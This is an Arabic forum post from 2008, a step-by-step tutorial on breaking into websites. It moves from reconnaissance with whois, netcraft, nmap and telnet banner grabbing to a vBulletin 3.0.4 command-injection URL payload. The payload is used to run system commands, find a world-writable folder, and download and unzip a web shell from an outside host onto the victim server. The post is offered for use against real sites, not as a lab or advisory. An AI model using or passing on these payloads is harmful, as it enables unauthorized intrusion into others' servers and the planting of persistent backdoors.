Bienvenue


    ادخل وسنأخذك يدا بيد في عالم الاختراق من الصفر حتى الاحتراف

    شاطر

    ali

    المساهمات : 28
    تاريخ التسجيل : 21/08/2008
    العمر : 30

    ادخل وسنأخذك يدا بيد في عالم الاختراق من الصفر حتى الاحتراف

    مُساهمة  ali في الأربعاء أغسطس 27, 2008 7:47 pm

    أقدم لكم هذا الشرح اللي كتبته بمجهودي الفردي واشكر جميع معلمي في هذا المنتدى والمنتديات الاخرى وشكر خاص موجه الى :-
    الساحر-جمرقان ، metoovet
    وغيرهم من الاعضاء
    نبدأ على بركة الله :-
    يجب أولا جمع المعلومات عن الموقع المراد اختراقه عن طريق عدة مواقع وهي :-
    1 - www.netcraft.com
    2- www.whois.net
    3- http://whois.webhosting.info/your site
    نبدا بالشرح وحدة وحدة
    أولا موقع :- www.netcraft.com
    تدخل الموقع يطلعلك مستطيل طويل يمتد من أول الصفحة لاخرها تكتب في اسم الموقع بدون
    http://
    بعدين تطلعلك عنو معلومات كثيرة ومنها تقرير عن الاموقع (site report) ونظام التشغيل (os)
    والسيرفر ورقم الاي بي
    ثانيا:- موقع www.whois.net
    تدخل الموقع ثم تجد سطرا تكتب به اسم الموقع ثم تختار .com و .net وغيره من قائمة موجودة بجانبه
    ثم تضغط go
    ملاحظة لكي تميز السطر يكون مكتوبا بجانبه whois look up

    ثالثا:- موقع http://whois.webhosting.info/your site
    بحيث ان المقصود بـ your site هو الموقع المراد جمع المعلومات عنه
    ستظهر لك معلومات مثل اسم الدومين ورقم الاي بي
    ملاحظة اضغط على رقم الاي بي وسيظهر لك باقي المواقع على السير فر
    وبهذا نكون انتهينا من الخطوة الأولى
    ---------------------------------------------------------------------------------------------------
    الخطوة الثانية :- جمع ثغرات
    كما ذكرنا بالخطوة الأولى جمع المعلومات فقد جمعناها لتساعدنا على اكتشاف الثغرات
    وهذه طريقة سهلة لجمع الثغرات :-
    الان اتفصح الموقع من منتدى معرض صور اصدار منتدى ...الخ
    ثم أعمل للموقع سكان ببرامج مثل سوبر سكان أو أدفانس سكانر عشان تشوف البورتات المفوحة
    أو باستخذام الأدة nmap
    ثم تشوف لبرامج اللي على البورتات المفتوحة تقولي كيف
    الان بقولك
    روح (start) ثم (run ) ثم اكتب telnet www.site.com port
    بحيث :-
    telnet = الأمر
    www.site.com = الموقع المراد جمع المعلومات عنه
    port = هو رقم البورت المفتوح
    تقولي اعطيني مثال تفضل خذ مثال
    مثلا الموقع اللي تبي تخترقه اسمه
    www.aliop700.com
    وبعد ما عملتله سكان طلع البورتات المفتوحة هي :-
    21
    25
    80
    هس بدك تشوف البرامج اللي على البورت 25
    تكتب telnet www.aliop700.com 25
    مثلا طلعلك عليه برنامج
    send mail 8.12
    الان تدخل مواقع السيكيوريتي مثل :-
    http://www.packetstormsecurity.com/
    http://www.securiteam.com
    وغيرها ....
    إذا ما لقيت ثغرات للبرنامج عليها ادخل على سيد الهكرز (موقع القوقل)
    www.google.com
    واكتب في مربع البحث
    exploit send mail 8.12
    حتى نفس الشي بالنسبة لـ اصدار الـ vb
    اذا ما لقيتله ثغرات تقدر تكتب
    exploit vbulletin x.x.x
    بحيث x هو رقم الإصدار
    ولا تنسى تفحص كل البورتات المفتوحة
    -----------------------------------------------------------------------------------------------------
    الخطوة الثالثة :- رفع الشل :-
    ذكرنا بالخطة السابقة جمع الثغرات وذلك لأجل رفع الشل
    نقول مثلا انك تفحصت اصدار المنتدى ولقيته vbulletin 3.0.4
    ورحت الـ milw0rm ودورت ولقيتله ثغرة وهي :-
    http://site/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."
    طبعا يكون مكتوب تحتها شروط انت طبق وما عليك
    اذا كان الموقع هو www.aliop700.com/vb
    يصير الرابط :-
    http://www.aliop700.com/vb/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."
    الان وصلنا للجزء المهم وهو تطبيق أوامر الدوس أو اللينكس
    وسأشرحها :-
    الان تحط عالمتصفح الرابط هذا
    http://www.aliop700.com/vb/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."
    وحط Enter

    راح يعطيك الصلاحيات والصلاحيات هي كالتالي :-
    nobody : معنى هذه الصلاححية انه لا يمكنك أبدا رفع الشل لكن الحلو في هذه الصلاحية انك تقدر تستعرض جميع اليوزرات اللي عالسيرفر مثل الشبح ههههههههههههه
    user : انت الان تطبق جميع الاوامر لكن على موقع واحد فقط اللي هو اللي رافع الشل عليه
    root : انت الان مدير السيرفر بامكانك عمل كل شيء على السيرفر .........
    ملاحظة يمكن يطلعلك apache وهي نفس no body
    نكمل بعد ما حطيت enter طلعلك
    uid=100(apache) gid=500(apache) groups=500(apache
    أو
    uid=100(nobody) gid=500(nobody)

    حلو معنى الكلام انك nobody لحد هنا تمام ok
    الن تحط مكان id تحط pwd يصير الرابط هكذا

    كود PHP:
    http://www.aliop700.com/vb/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('pwd')."

    تحط enter وهذا الأمر يعرض مسارك على السيرفر
    مثلا طلع انو مسارك
    /home/domains/admin.com/public_html/vb
    حلو الان تحط الأمر ls -la عشان تعرف الملف اللي يحمل تصريح drwxrwxrwx 777
    مثلا طلعلك انو ملف اسمو hot يحمل التصريح 777 لازم تحط
    cd /home/domains/admin.com/public_html/vb/hot;wget http://shell.com/shell.zip ;ls -la
    بحيث cd = أمر الدخول
    wget = أمر سحب الشل
    ls -la = أمر استعراض التصاريح
    ;= هي تفصل بين الأوامر
    ويصير الرابط

    كود PHP:
    http://www.aliop700.com/vb/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('cd /home/domains/admin.com/public_html/vb/hot;wget http://shell.com/shell.zip ;ls -la ')."

    وتحط enter
    والان تحط
    الامر unzip لفك ضغط الشل
    ويصير الرابط :-

    كود PHP:
    http://www.aliop700.com/vb/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('cd /home/domains/admin.com/public_html/vb/hot;unzip shell.zip;ls -la ')."

    وتحط enter
    مع مراعاة ان shell.zip
    هو اسم الملف فاذا رفعت الملف المضغوط باسم aliop يجب ان تكتب unzip aliop.zip
    وهكذا تكون رفعت الشل أكمل الموضوع بعدين
    انشاء الله يكون الموضوع أعجبكم

      الوقت/التاريخ الآن هو الخميس أكتوبر 19, 2017 2:07 pm